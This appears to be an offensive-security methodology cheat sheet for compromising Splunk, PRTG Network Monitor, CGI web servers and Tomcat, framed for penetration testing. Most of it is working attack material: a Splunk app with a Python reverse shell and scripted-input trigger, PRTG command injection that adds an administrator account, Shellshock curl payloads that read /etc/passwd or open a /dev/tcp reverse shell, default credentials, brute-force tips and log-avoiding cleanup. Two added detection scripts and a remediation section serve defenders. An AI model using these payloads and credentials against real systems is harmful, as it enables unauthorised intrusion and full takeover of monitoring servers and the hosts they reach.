Methodology Checklist
- Splunk: admin interface on port 8000/8089
- Default creds: admin/changeme → if changed, brute-force or credential spray
- Splunk RCE: upload malicious app (Python/Bash script)
- PRTG: port 80/443/8080 → default PrtgAdm1n or prtgadmin/prtgadmin
- PRTG CVE-2018-9276: command injection via notifications
- CGI Shellshock:
  curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1" http://[TARGET]/cgi-bin/test.cgi
- Check the CGI-BIN path for outdated scripts
Operational Context
Use when: Splunk, PRTG Network Monitor, or a CGI-enabled web server is identified → exploit Splunk RCE via custom app upload, PRTG command injection, or Shellshock on CGI.
Think Dumber First: Splunk with admin creds = instant RCE via custom app upload (malicious .spl file). PRTG default creds: prtgadmin/prtgadmin. CGI endpoint? Try Shellshock: curl -H 'User-Agent: () { :; }; echo; echo; /bin/id'.
Skip when: No admin access to Splunk/PRTG and no credential brute-force path.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| nmap -sV -p 8000,8089 [TARGET_IP] | Splunk ports: 8000 (Web UI), 8089 (REST API) |
| curl -k https://[TARGET_IP]:8089/services/server/info | Unauthenticated Splunk version via REST API |
| tar -cvzf updater.tar.gz splunk_shell/ | Package Splunk malicious app for deployment |
| nc -lvnp [LPORT] | Catch Splunk reverse shell (fires within 10s of upload) |
| nmap -sV -p- --open -T4 [TARGET_IP] | Full scan to find PRTG on 80/443/8080 |
| curl -s http://[TARGET_IP]:[PORT]/index.htm -A "Mozilla/5.0" \| grep version | PRTG version check |
| nxc smb [TARGET_IP] -u [USER] -p [PASS] | Verify PRTG-created local admin via SMB |
| evil-winrm -i [TARGET_IP] -u [USER] -p [PASS] | Interactive session after PRTG privesc |
| gobuster dir -u http://[TARGET_IP]/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -x cgi,sh | Find CGI scripts for Shellshock |
| curl -H "User-Agent: () { :; }; echo; echo; /bin/cat /etc/passwd" http://[TARGET_IP]/cgi-bin/[SCRIPT].cgi | Shellshock (CVE-2014-6271) information leak |
| curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1" http://[TARGET_IP]/cgi-bin/[SCRIPT].cgi | Shellshock reverse shell |
Deep Dive & Workflow
Splunk RCE via Malicious App
Directory structure (case-sensitive on Linux):

```text
splunk_shell/
├── bin/
│   ├── rev.py      # Linux payload
│   ├── run.bat     # Windows wrapper
│   └── run.ps1     # Windows payload
└── default/
    └── inputs.conf # Trigger config
```

inputs.conf:

```ini
[script://./bin/rev.py]
disabled = 0
sourcetype = shell
interval = 10

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10
```

Linux rev.py:

```python
import sys,socket,os,pty
s=socket.socket()
s.connect(("[LHOST]",int([LPORT])))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')
```

Windows run.bat:

```bat
@ECHO OFF
PowerShell.exe -exec bypass -w hidden -Command "& '%~dpn0.ps1'"
Exit
```

Deploy: Web UI (port 8000) → Gear icon → Install app from file → check "Upgrade app".
Default creds: admin:changeme. Free version (expired trial) β no auth at all.
Cleanup: Remove the app immediately: it calls back every 10 seconds and creates logs.
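Defender-side counterpart to the scripted-input trigger above (an added example, not code from the original page): it parses an app's inputs.conf, lists every enabled [script://...] stanza, and flags short polling intervals such as the 10-second one used here. The sample inputs.conf is constructed to mirror that layout plus a benign monitor stanza.

```python
import configparser

# Constructed sample mirroring the inputs.conf of the malicious app above:
# one Linux and one Windows scripted input, both enabled, both polling every 10 s,
# plus a benign file monitor that must not be flagged.
SAMPLE_INPUTS_CONF = r"""
[script://./bin/rev.py]
disabled = 0
sourcetype = shell
interval = 10

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10

[monitor:///var/log/syslog]
disabled = 0
sourcetype = syslog
"""


def parse_inputs_conf(text):
    """Parse Splunk's INI-style inputs.conf into {stanza: {key: value}}."""
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None, strict=False)
    cp.optionxform = str  # keep key case exactly as written in the file
    cp.read_string(text)
    return {s: dict(cp.items(s)) for s in cp.sections()}


def find_scripted_inputs(text, max_interval=60):
    """Return every enabled [script://...] stanza; flag intervals <= max_interval seconds.

    A freshly installed app whose scripted input fires every few seconds is the
    pattern to triage first: Splunk runs the script with splunkd's privileges."""
    findings = []
    for stanza, kv in parse_inputs_conf(text).items():
        if not stanza.startswith("script://"):
            continue
        if kv.get("disabled", "0").strip().lower() in ("1", "true"):
            continue
        interval = kv.get("interval", "").strip()
        findings.append({
            "stanza": stanza,
            "script": stanza[len("script://"):],
            "interval": interval,
            # non-numeric intervals are cron expressions; those are left unflagged
            "short_interval": interval.isdigit() and int(interval) <= max_interval,
        })
    return findings
```

Point it at `$SPLUNK_HOME/etc/apps/*/default/inputs.conf` and `local/inputs.conf` after an unexpected app install shows up in the audit log.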
PRTG CVE-2018-9276 (Authenticated Command Injection)
Affects: PRTG < 18.2.39
Auth: prtgadmin:prtgadmin (default)
Execution: NT AUTHORITY\SYSTEM (Windows)
Blind: no command output in UI
Path:
1. Setup → Account Settings → Notifications → Add new notification
2. Check "EXECUTE PROGRAM"
3. Program File: Demo exe notification - outfile.ps1
4. Parameter: test.txt;net user [USER] [PASS] /add;net localgroup administrators [USER] /add
   (or base64 PS reverse shell)
5. Save → click Test button in notification list
6. Wait 15-30s → shell pops or verify via CrackMapExec
Base64 reverse shell: generate at RevShells.com → "PowerShell #3 (Base64)" → inject as: test.txt; powershell -e [BASE64]
CGI / Shellshock (CVE-2014-6271)
Targets: Bash < 4.3 + CGI enabled + User-Agent passed to env
Found at: /cgi-bin/*.cgi, /cgi-bin/*.sh, /cgi-bin/*.pl
Payload structure:
- `() { :; };` marks the start of a function definition
- `echo; echo;` emits the blank line that separates HTTP headers from body
- `/bin/cmd` is the actual injected command
Confirm vulnerability (information leak):

```bash
curl -H "User-Agent: () { :; }; echo; echo; /bin/cat /etc/passwd" http://[TARGET_IP]/cgi-bin/[SCRIPT].cgi
```

Reverse shell:

```bash
curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/[LHOST]/[LPORT] 0>&1" http://[TARGET_IP]/cgi-bin/[SCRIPT].cgi
```

Pitfalls:
| Issue | Fix |
|---|---|
| 500 error | Add echo; echo; before command |
| 200 OK empty | Try Referer header instead of User-Agent |
| No callback | Use absolute path: /bin/bash not bash |
| Patched Bash | Shellshock is all-or-nothing; move to other vectors |
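An added detection example (not from the original page) that applies the payload structure above from the defender's side: it scans combined-format access log lines and flags User-Agent or Referer values that begin with the `() {` function-definition prefix, which is the only form a vulnerable Bash imports as a function. The log lines are constructed samples.

```python
import re

# Constructed sample: combined-format access log lines. The 2nd line carries the
# Shellshock prefix in User-Agent, the 3rd in Referer; the 4th only mentions "() {}"
# mid-string, which Bash never treats as a function import.
SAMPLE_LOG = r'''
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 0 "-" "() { :; }; echo; echo; /bin/cat /etc/passwd"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { :;}; /bin/bash -i" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11) Function () {}"
'''

# Combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Vulnerable Bash only imports a function when the variable value *starts* with "() {",
# so anchor at the beginning of the header value instead of searching anywhere in it.
SHELLSHOCK_RE = re.compile(r'^\s*\(\)\s*\{')


def scan_access_log(text):
    """Return one hit per header value that begins with the Shellshock prefix."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.match(m.group(field)):
                hits.append({
                    "ip": m.group("ip"),
                    "field": "User-Agent" if field == "ua" else "Referer",
                    "request": m.group("req"),
                    "status": m.group("status"),
                    # prefix on a CGI path: review the host, whatever the status code
                    "cgi_target": "/cgi-bin/" in m.group("req"),
                })
    return hits
```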
Tomcat CGIServlet RCE (Windows, CVE-2019-0232)
Apache Tomcat on Windows with the CGI servlet enabled and enableCmdLineArguments set to true lets an attacker inject command-line arguments through the URL: a request to a .bat CGI script can point it at an absolute Windows binary path.
```bash
# URL-encoded: c%3A%5C... = c:\windows\system32\whoami.exe
curl "http://[TARGET_IP]:8080/cgi/cmd.bat?&c%3A%5Cwindows%5Csystem32%5Cwhoami.exe"
```

- Distinct from Shellshock: this is Windows/Tomcat-specific, not Bash.
- Find the CGI dir first (/cgi/, /cgi-bin/); the script must be a .bat/.cmd handler.
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Splunk custom app upload blocked | Non-admin account | Splunk RCE requires admin; brute admin account or find creds in config files |
| PRTG default creds fail | Changed from default | Try: prtgadmin/prtgadmin, admin/admin, year-based passwords; check PRTG config files for stored creds |
| Shellshock test returns nothing | CGI not executing bash | Verify CGI: nmap --script http-shellshock [TARGET]; only works on CGI handlers using bash |
| Splunk .spl app install fails | Wrong format | .spl is a .tar.gz; create: tar czf app.spl app/; must contain default/ or bin/ directory |
| PRTG command injection in sensor | Wrong parameter | PRTG CVE-2018-9276: inject via sensor notification, not standard parameter |
Reporting Trigger
Finding Title: Splunk/PRTG Default Credentials Enable Authenticated RCE
Impact: Default or weak credentials on Splunk or PRTG provide admin access enabling immediate remote code execution through legitimate admin functionality (Splunk app upload, PRTG notifications), compromising the monitoring server and all hosts it can reach.
Root Cause: Default credentials not changed during deployment. Monitoring applications not included in hardening standards. No MFA on admin interfaces.
Recommendation: Change all default credentials on deployment. Implement MFA on Splunk and PRTG admin interfaces. Restrict admin access to the management network. Perform regular credential audits of all monitoring platforms.